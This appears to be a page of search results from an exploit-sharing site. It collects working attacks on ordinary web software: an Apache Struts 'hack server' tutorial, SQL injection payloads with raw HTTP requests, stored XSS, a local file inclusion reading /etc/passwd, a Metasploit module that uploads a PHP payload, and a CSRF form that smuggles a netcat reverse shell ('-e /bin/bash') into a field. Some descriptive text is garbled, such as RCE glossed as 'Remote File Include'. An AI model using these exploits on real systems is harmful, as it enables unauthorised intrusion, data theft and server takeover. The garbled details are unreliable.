60 results found

  1. Victory

    Hacking AdobeReader BLEND vulnerability Exploit

    https://www.mediafire.com/file/9gu0kcdnd2l5c19/01zx.zip/file
    The tutorial video is inside the file. Password: anonysec.org
  2. Hack server with apache struts exploit

    Description

    After a while, we again saw a new and sensitive bug for Apache Struts. A new vulnerability has been discovered for the Apache-Struts service, which is of the rce type (Remote File Include). This security hole is in versions 2.3 to 2.3.34 | There are 2.5-5.2.5.16. To keep the server secure, be sure to update it to the latest version. This vulnerability can be used in a variety of ways, but in this tutorial we introduce two tools that are easy to use.

    Hacking the server using the first method

    Be careful at first: on the system where you want to test the exploit, install Python 2 or 3, because the tool is written in Python. Download the tool from the download section at the bottom of the page. To download it as a folder on your Linux system, use the following command:

        git clone link

    Then enter the downloaded folder, which contains the main tool, with the following command:

        cd struts-pwn_CVE-2018-11776

    To check whether a site is vulnerable to this vulnerability, enter its address as shown below:

        python3 struts-pwn.py -url https://site.com/struts2-showcase/index.action

    If you want to check multiple websites at the same time, save them in a file and submit that file to the program as a list:

        python3 struts-pwn.py -list list-site.txt

    Use the following command to use this vulnerability:

        python3 struts-pwn.py -exploit -url 'https://site.com/struts2-showcase/index.action' -c id

    Secondary Hacking Method

    Secondary Hacking Tool: another tool we introduce to use the vulnerabilities with the following identifiers: CVE-2013-2251, CVE-2017-5638, CVE-2018-11776.

    First download the tool from the download section:

        git clone link

    Then enter the downloaded folder:

        cd Apache-Struts-v3

    Now run the tool with the following command:

        python ApacheStruts.py

    After the tool is executed, it does not need to be used with switches; each option you want to use is in the tool's menu. The executed tool will take the link of the site you want and run the exploit if there is a vulnerability. You will have full remote access and can execute your commands on the site's server.

    Conclusion

    The second tool introduced is a relatively simpler way to hack the server, but the second tool gives you more options. Your choice depends on your type of work, and to ensure security against this security hole, be sure to update all installed server packages.

    Download tools

    The first tool: https://github.com/mazen160/struts-pwn_CVE-2018-11776.git
    Second tool: https://github.com/s1kr10s/Apache-Struts-v3.git

    http://www.exploit4arab.org/exploits/2206
  3. # Exploit Title: Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection

    # Date: 2018-09-09
    # Exploit Author: Ceylan Bozogullarindan
    # Vendor Homepage: http://modalsurvey.pantherius.com/
    # Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip
    # Version: 1.5.7.3
    # Tested on: Windows 10
    # CVE: N\A

    # Description
    # The vulnerability allows an attacker to inject sql commands using a value of a cookie parameter.

    # PoC
    # Step 1. When you visit a page which has a poll or survey, a question will appear for answering.
    # Answer that question.
    # Step 2. When you answer the question, wp_sap will be assigned a value. Open a cookie manager,
    # and change it to the payload shown below;
    ["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]
    # It is important that the "OR" statement must be 1=2, because the application is reflecting the first result
    # of the query. When you make it 1=1, you should see a question from the first record.
    # Therefore the OR statement must return False.
    # Step 3. Reload the page. Open the source code of the page. Search "sss_params".
    # You will see the version of the DB in the value of the sss_params parameter.

    # The Request
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    Cache-Control: max-age=0

    # The result from the source code of the page
    <script type='text/javascript'>
    /* <![CDATA[ */
    var sss_params = {"survey_options":"{\"options\":\"[\\\"center\\\",\\\"easeInOutBack\\\",\\\"\\\",\\\"-webkit-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-moz-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-ms-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-o-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);\\\",\\\"rgb(0, 0, 0)\\\",\\\"rgb(93, 93, 93)\\\",\\\"1\\\",\\\"5\\\",\\\"12\\\",\\\"10\\\",\\\"12\\\",500,\\\"Thank you for your feedback!\\\",\\\"0\\\",\\\"0\\\",\\\"0\\\"]\",\"plugin_url\":\"http:\\\/\\\/www.*****.com\\\/wp-content\\\/plugins\\\/wp-survey-and-poll\",\"admin_url\":\"http:\\\/\\\/www.******.com\\\/wp-admin\\\/admin-ajax.php\",\"survey_id\":\"1101225978\",\"style\":\"modal\",\"expired\":\"false\",\"debug\":\"true\",\"questions\":[[\"Are You A First Time Home Buyer?\",\"Yes\",\"No\"],[\>>>>>>"10.1.36-MariaDB-1~trusty\"<<<<<<<]]}"};
    /* ]]> */
    </script>

    DB version: "10.1.36-MariaDB-1~trusty"....
  4. <!--
    About:
    ===========
    Component: Plainview Activity Monitor (Wordpress plugin)
    Vulnerable version: 20161228 and possibly prior
    Fixed version: 20180826
    CVE-ID: CVE-2018-15877
    CWE-ID: CWE-78
    Author:
    - Lydéric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)

    Timeline:
    ===========
    - 2018/08/25: Vulnerability found
    - 2018/08/25: CVE-ID request
    - 2018/08/26: Reported to developer
    - 2018/08/26: Fixed version
    - 2018/08/26: Advisory published on GitHub
    - 2018/08/26: Advisory sent to bugtraq mailing list

    Description:
    ===========
    Plainview Activity Monitor Wordpress plugin is vulnerable to OS command injection which allows an attacker to remotely execute commands on the underlying system.
    The application passes unsafe user-supplied data via the ip parameter into activities_overview.php.
    Privileges are required in order to exploit this vulnerability, but this plugin version is also vulnerable to CSRF attack and Reflected XSS.
    Combined, these three vulnerabilities can lead to Remote Command Execution with just an admin click on a malicious link.

    References:
    ===========
    https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/

    PoC:
    -->
    <html>
    <!--
    Wordpress Plainview Activity Monitor RCE
    [+] Version: 20161228 and possibly prior
    [+] Description: Combine OS Commanding and CSRF to get reverse shell
    [+] Author: Lydéric LEFEBVRE
    [+] CVE-ID: CVE-2018-15877
    [+] Usage: Replace 127.0.0.1 & 9999 with your ip and port to get reverse shell
    [+] Note: Many reflected XSS exist on this plugin and can be combined with this exploit as well
    -->
    <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
      <input type="hidden" name="lookup" value="Lookup" />
      <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>
  5. # Exploit Title: WordPress Plugin Quizlord 2.0 - Cross-Site Scripting

    # Date: 2018-08-29
    # Exploit Author: Renos Nikolaou
    # Software Link: https://downloads.wordpress.org/plugin/quizlord.zip
    # Version: 2.0
    # Tested on: Kali Linux
    # CVE: N/A
    # Description : Quizlord is prone to Stored Cross Site Scripting vulnerabilities
    # because it fails to properly sanitize user-supplied input.

    # PoC - Stored XSS - Parameter: title
    # 1) Login as a user who has access to the Jibu Pro plugin.
    # 2) Quizlord --> Add a Quiz.
    # 3) At the title type: poc"><script>alert(1)</script> , then fill the remaining fields and click Save.
    # (The first pop-up will appear. Also keep note of the shortcode: [quizlord id="#"])
    # 4) Copy the Shortcode [quizlord id="#"] into any post or page and visit it via browser.

    # Post Request (Step 3):
    POST /wordpress/wp-admin/admin.php HTTP/1.1
    Host: domain.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://domain.com/wordpress/wp-admin/admin.php?page=quizlord
    Cookie: wordpress_295cdc576d46a74a4105db5d33654g45
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 188

    action=ql_insert&title=poc"><script>alert(1)</script>&description=&time=0&numbtype=numerical&numbmark=&rightcolor=00FF00&wrongcolor=FF0000&showtype=paginated&addquiz=Save
  6. Title: Blind SQL injection and multiple reflected XSS vulnerabilities in Wordpress Plugin Arigato Autoresponder and Newsletter v2.5

    Author: Larry W. Cashdollar, @_larry0
    Date: 2018-08-22
    CVE-IDs: [CVE-2018-1002000] [CVE-2018-1002001] [CVE-2018-1002002] [CVE-2018-1002003] [CVE-2018-1002004] [CVE-2018-1002005] [CVE-2018-1002006] [CVE-2018-1002007] [CVE-2018-1002008] [CVE-2018-1002009]
    Download Site: https://wordpress.org/plugins/bft-autoresponder/
    Vendor: Kiboko Labs https://calendarscripts.info/
    Vendor Notified: 2018-08-22, Fixed v2.5.1.5
    Vendor Contact: @prasunsen wordpress.org
    Advisory: http://www.vapidlabs.com/advisory.php?v=203

    Description:
    This plugin allows scheduling of automated autoresponder messages and newsletters, and managing a mailing list. You can add/edit/delete and import/export members. There is also a registration form which can be placed in any website or blog. You can schedule an unlimited number of email messages. Messages can be sent on a defined number of days after user registration, or on a fixed date.

    Vulnerability:
    These vulnerabilities require administrative privileges to exploit.

    CVE-2018-1002000
    There is an exploitable blind SQL injection vulnerability via the del_ids variable by POST request. In line 69 of file controllers/list.php:

    65 $wpdb->query("DELETE FROM ".BFT_USERS." WHERE id IN (".$_POST['del_ids'].")");

    del_ids is not sanitized properly.

    Nine Reflected XSS.

    CVE-2018-1002001
    In line 22-23 of controllers/list.php:
    22 $url = "admin.php?page=bft_list&offset=".$_GET['offset']."&ob=".$_GET['ob'];
    23 echo "<meta http-equiv='refresh' content='0;url=$url' />";

    CVE-2018-1002002
    bft_list.html.php:28:
    <div><label><?php _e('Filter by email', 'broadfast')?>:</label> <input type="text" name="filter_email" value="<?php echo @$_GET['filter_email']?>"></div>

    CVE-2018-1002003
    bft_list.html.php:29:
    <div><label><?php _e('Filter by name', 'broadfast')?>:</label> <input type="text" name="filter_name" value="<?php echo @$_GET['filter_name']?>"></div>

    CVE-2018-1002004
    bft_list.html.php:42:
    <input type="text" class="bftDatePicker" name="sdate" id="bftSignupDate" value="<?php echo empty($_GET['sdate']) ? '' : $_GET['sdate']?>">

    CVE-2018-1002005
    bft_list.html.php:43:
    <input type="hidden" name="filter_signup_date" value="<?php echo empty($_GET['filter_signup_date']) ? '' : $_GET['filter_signup_date']?>" id="alt_bftSignupDate"></div>

    CVE-2018-1002006
    integration-contact-form.html.php:14:
    <p><label><?php _e('CSS classes (optional):', 'broadfast')?></label> <input type="text" name="classes" value="<?php echo @$_POST['classes']?>"></p>

    CVE-2018-1002007
    integration-contact-form.html.php:15:
    <p><label><?php _e('HTML ID (optional):', 'broadfast')?></label> <input type="text" name="html_id" value="<?php echo @$_POST['html_id']?>"></p>

    CVE-2018-1002008
    list-user.html.php:4:
    <p><a href="admin.php?page=bft_list&ob=<?php echo $_GET['ob']?>&offset=<?php echo $_GET['offset']?>"><?php _e('Back to all subscribers', 'broadfast');?></a></p>

    CVE-2018-1002009
    unsubscribe.html.php:3:
    <p><input type="text" name="email" value="<?php echo @$_GET['email']?>"></p>

    Exploit Code:

    SQL Injection CVE-2018-1002000
    $ sqlmap --load-cookies=./cook -r post_data --level 2 --dbms=mysql

    Where post_data is:

    POST /wp-admin/admin.php?page=bft_list&ob=email&offset=0 HTTP/1.1
    Host: example.com
    Connection: keep-alive
    Content-Length: 150
    Cache-Control: max-age=0
    Origin: http://example.com
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Referer: http://example.com/wp-admin/admin.php?page=bft_list&ob=email&offset=0
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: wordpress_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

    mass_delete=1&del_ids=*&_wpnonce=aa7aa407db&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dbft_list%26ob%3Demail%26offset%3D0

    (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
    sqlmap identified the following injection point(s) with a total of 300 HTTP(s) requests:
    ---
    Parameter: #1* ((custom) POST)
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 time-based blind - Parameter replace
        Payload: mass_delete=1&del_ids=(CASE WHEN (6612=6612) THEN SLEEP(5) ELSE 6612 END)&_wpnonce=aa7aa407db&_wp_http_referer=/wp-admin/admin.php?page=bft_list%26ob=email%26offset=0
    ---
    [11:50:08] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Debian 8.0 (jessie)
    web application technology: Apache 2.4.10
    back-end DBMS: MySQL >= 5.0.12
    [11:50:08] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.47'

    [*] shutting down at 11:50:08

    CVE-2018-1002001
    http://example.com/wp-admin/admin.php?page=bft_list&action=edit&id=12&ob=XSS&offset=XSS
  7. # Exploit Title: WordPress Plugin Localize My Post 1.0 - Local File Inclusion

    # Author: Manuel Garcia Cardenas
    # Date: 2018-09-19
    # Software link: https://es.wordpress.org/plugins/localize-my-post/
    # CVE: 2018-16299

    # DESCRIPTION
    # This bug was found in the file: /localize-my-post/ajax/include.php
    # include($_REQUEST['file']);
    # The parameter "file" is not sanitized, allowing inclusion of local files.
    # To exploit the vulnerability it is only necessary to use version 1.0 of the HTTP protocol to interact with the application.

    # Local File Inclusion POC:
    GET /wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
  8. ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HTTP::Wordpress
      include Msf::Exploit::PhpEXE

      def initialize(info={})
        super(update_info(info,
          'Name'            => "WordPress Responsive Thumbnail Slider Arbitrary File Upload",
          'Description'     => %q{
            This module exploits an arbitrary file upload vulnerability in Responsive
            Thumbnail Slider Plugin v1.0 for WordPress post authentication.
          },
          'License'         => MSF_LICENSE,
          'Author'          =>
            [
              'Arash Khazaei',  # EDB PoC
              'Shelby Pace'     # Metasploit Module
            ],
          'References'      =>
            [
              [ 'EDB', '37998' ]
            ],
          'Platform'        => 'php',
          'Arch'            => ARCH_PHP,
          'Targets'         =>
            [
              [ 'Responsive Thumbnail Slider Plugin v1.0', { } ]
            ],
          'Privileged'      => false,
          'DisclosureDate'  => "Aug 28 2015",
          'DefaultTarget'   => 0))

        register_options(
          [
            OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]),
            OptString.new('WPUSERNAME', [ true, "WordPress Username to authenticate with", 'admin' ]),
            OptString.new('WPPASSWORD', [ true, "WordPress Password to authenticate with", '' ])
          ])
      end

      def check
        # The version regex found in extract_and_check_version does not work for this plugin's
        # readme.txt, so we build a custom one.
        check_code = check_version || check_plugin_path
        if check_code
          return check_code
        else
          return CheckCode::Safe
        end
      end

      def check_version
        plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt')

        res = send_request_cgi(
          'method'  =>  'GET',
          'uri'     =>  plugin_uri
        )

        if res && res.body && res.body =~ /Version:([\d\.]+)/
          version = Gem::Version.new($1)
          if version <= Gem::Version.new('1.0')
            vprint_status("Plugin version found: #{version}")
            return CheckCode::Appears
          end
        end

        nil
      end

      def check_plugin_path
        plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/')

        res = send_request_cgi(
          'method'  =>  'GET',
          'uri'     =>  plugin_uri
        )

        if res && res.code == 200
          vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected')
          return CheckCode::Detected
        end

        nil
      end

      def login
        auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD'])
        return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_cookies

        store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies)
        print_good("Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}")

        auth_cookies
      end

      def upload_payload(cookies)
        manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management'
        file_payload = get_write_exec_payload(:unlink_self => true)
        file_name = "#{rand_text_alpha(5)}.php"

        # attempt to access plugins page
        plugin_res = send_request_cgi(
          'method'  =>  'GET',
          'uri'     =>  normalize_uri(target_uri.path, manage_uri),
          'cookie'  =>  cookies
        )

        unless plugin_res && plugin_res.body.include?("tmpl-uploader-window")
          fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Slider Plugin Page")
        end

        data = Rex::MIME::Message.new
        data.add_part(file_payload, 'image/jpeg', nil, "form-data; name=\"image_name\"; filename=\"#{file_name}\"")
        data.add_part(file_name.split('.')[0], nil, nil, "form-data; name=\"imagetitle\"")
        data.add_part('Save Changes', nil, nil, "form-data; name=\"btnsave\"")
        post_data = data.to_s

        # upload the file
        upload_res = send_request_cgi(
          'method'  =>  'POST',
          'uri'     =>  normalize_uri(target_uri.path, manage_uri, '&action=addedit'),
          'cookie'  =>  cookies,
          'ctype'   =>  "multipart/form-data; boundary=#{data.bound}",
          'data'    =>  post_data
        )

        page = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies)
        fail_with(Failure::Unknown, "Unsure of successful upload") unless (upload_res && page && page.body =~ /New\s+image\s+added\s+successfully/)

        retrieve_file(page, cookies)
      end

      def retrieve_file(res, cookies)
        fname = res.body.scan(/slider\/(.*\.php)/).flatten[0]
        # check for nil before empty?, otherwise a missing match raises NoMethodError
        fail_with(Failure::BadConfig, "Couldn't find file name") if fname.nil? || fname.empty?

        file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}")
        print_good("Successful upload")

        send_request_cgi(
          'uri'     =>  file_uri,
          'method'  =>  'GET',
          'cookie'  =>  cookies
        )
      end

      def exploit
        unless check == CheckCode::Safe
          auth_cookies = login
          upload_payload(auth_cookies)
        end
      end
    end
  9. # Exploit Title: Simple Chat System 1.0 - 'id' SQL Injection

    # Dork: N/A
    # Date: 2018-10-24
    # Exploit Author: Ihsan Sencan
    # Vendor Homepage: https://www.sourcecodester.com/php/11610/simple-chat-system.html
    # Software Link: https://sourceforge.net/projects/simple-chat-system/files/latest/download
    # Version: 1.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A

    # POC:
    # 1)
    # http://localhost/[PATH]/user/chatroom.php?id=[SQL]
    #
    # [PATH]/user/chatroom.php
    # 03 <?php
    # 04 $id=$_REQUEST['id'];
    # 05
    # 06 $chatq=mysqli_query($conn,"select * from chatroom where chatroomid='$id'");
    # 07 $chatrow=mysqli_fetch_array($chatq);

    GET /[PATH]/user/chatroom.php?id=-3%27雷�穑ɏ볯纵듧纹럫庞%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e--+ HTTP/1.1
    Host: TARGET
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: PHPSESSID=fuobifeugni2gnt2kir6patce6
    Connection: keep-alive

    HTTP/1.1 200 OK
    Date: Wed, 24 Oct 2018 20:44:14 GMT
    Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
    X-Powered-By: PHP/5.6.30
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Keep-Alive: timeout=5, max=98
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
  10. # Exploit Title: Vishesh Auto Index 3.1 - 'fid' SQL Injection

    # Dork: N/A
    # Date: 2018-10-15
    # Exploit Author: Ihsan Sencan
    # Vendor Homepage: http://www.vishesh.cf/
    # Software Link: https://sourceforge.net/projects/vishesh-wap-auto-index/files/latest/download
    # Version: 3.1
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A

    # POC:
    # 1)
    # http://192.168.1.27/[PATH]/file.php?fid=[SQL]
    -1%20UnioN%20seLECt%20112115%2c112115%2c112115%2c112115%2c112115%2c112115%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c112115%2c112115%2c112115%2c112115%2c112115%2c112115%2d%2d%20Efe

    GET /[PATH]/file.php?fid=-1%20UnioN%20seLECt%20112115%2c112115%2c112115%2c112115%2c112115%2c112115%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c112115%2c112115%2c112115%2c112115%2c112115%2c112115%2d%2d%20Efe HTTP/1.1
    Host: 192.168.1.27
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: PHPSESSID=nk7b5obkruk2rtd2kbm3gamg42
    Connection: keep-alive

    HTTP/1.1 200 OK
    Date: Sat, 15 Oct 2018 01:12:23 GMT
    Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
    X-Powered-By: PHP/5.6.30
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Content-Length: 7799
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

    # POC:
    # 2)
    # http://192.168.1.27/[PATH]/download.php?fid[SQL]
    -1%20UnioN%20select%20ConcAT((SElecT%20GrouP_ConcAT(schema_nAME%20SEPAratoR%200x3c62723e)%20FRom%20INFORmatION_ScheMA.SchematA))%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2d%2d%20Efe

    GET /[PATH]/download.php?fid=-1%20UnioN%20select%20ConcAT((SElecT%20GrouP_ConcAT(schema_nAME%20SEPAratoR%200x3c62723e)%20FRom%20INFORmatION_ScheMA.SchematA))%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2d%2d%20Efe HTTP/1.1
    Host: 192.168.1.27
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: PHPSESSID=nk7b5obkruk2rtd2kbm3gamg42
    Connection: keep-alive

    HTTP/1.1 200 OK
    Date: Sat, 15 Oct 2018 01:18:41 GMT
    Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
    X-Powered-By: PHP/5.6.30
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Content-Length: 835
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  11. # Exploit Title: MySQL Edit Table 1.0 - 'id' SQL Injection

    # Dork: N/A
    # Date: 2018-10-18
    # Exploit Author: Ihsan Sencan
    # Vendor Homepage: https://www.bookman.nl
    # Software Link: https://sourceforge.net/projects/sql-edit-table/files/latest/download
    # Version: 1.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A

    # POC:
    # 1)
    # http://localhost/[PATH]/example.php?mte_a=edit&id=[SQL]
    # function edit_rec() {
    #   if (isset ($_GET['id'])) $in_id = $_GET['id'];
    #   if ($_GET['mte_a'] == 'edit') $edit=1;
    #   else $edit = 0;
    #   $count_required = 0;
    #   $rows = '';
    #   $result = mysqli_query($this->mysqli,"SHOW COLUMNS FROM `$this->table`");

    GET /[PATH]/example.php?mte_a=edit&id=-18++UNIon(SEleCT+0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e)--+- HTTP/1.1
    Host: TARGET
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Cookie: PHPSESSID=0v2bqm10m5rlph8563tiflttl7
    DNT: 1
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    If-Modified-Since: Thu, 18 Oct 2018 14:31:03 GMT

    HTTP/1.1 200 OK
    Date: Thu, 18 Oct 2018 14:34:58 GMT
    Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
    X-Powered-By: PHP/5.6.30
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: private
    Pragma: no-cache
    Last-Modified: Thu, 18 Oct 2018 14:34:58 GMT
    Content-Length: 3642
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

    # POC:
    # 2)
    # http://localhost/[PATH]/example.php?mte_a=del&id=[SQL]
    #
    # function del_rec() {
    #   $in_id = $_GET['id'];
    #   if (mysqli_query($this->mysqli,"DELETE FROM $this->table WHERE `$this->primary_key` = '$in_id'")) {
    #     $this->content_deleted = "

    GET /[PATH]/example.php?mte_a=del&id=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%31%31%31%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%31%31%3d%31%31%31%2c%31%29%29%29%29%29%2d%2d%20%45%66%65 HTTP/1.1
    Host: TARGET
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Cookie: PHPSESSID=0v2bqm10m5rlph8563tiflttl7
    DNT: 1
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    If-Modified-Since: Thu, 18 Oct 2018 14:38:14 GMT

    HTTP/1.1 200 OK
    Date: Thu, 18 Oct 2018 14:38:18 GMT
    Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
    X-Powered-By: PHP/5.6.30
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: private
    Pragma: no-cache
    Last-Modified: Thu, 18 Oct 2018 14:38:18 GMT
    Content-Length: 1046
    Keep-Alive: timeout=5, max=99
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
